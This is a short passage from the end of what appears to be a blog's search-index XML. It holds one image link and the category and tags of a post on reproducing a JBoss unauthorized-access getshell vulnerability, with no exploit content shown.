src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/2538330172164.png"></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> JBOSS </tag>
<tag> JBOSS未授权访问Getshell </tag>
</tags>
</entry>
</search>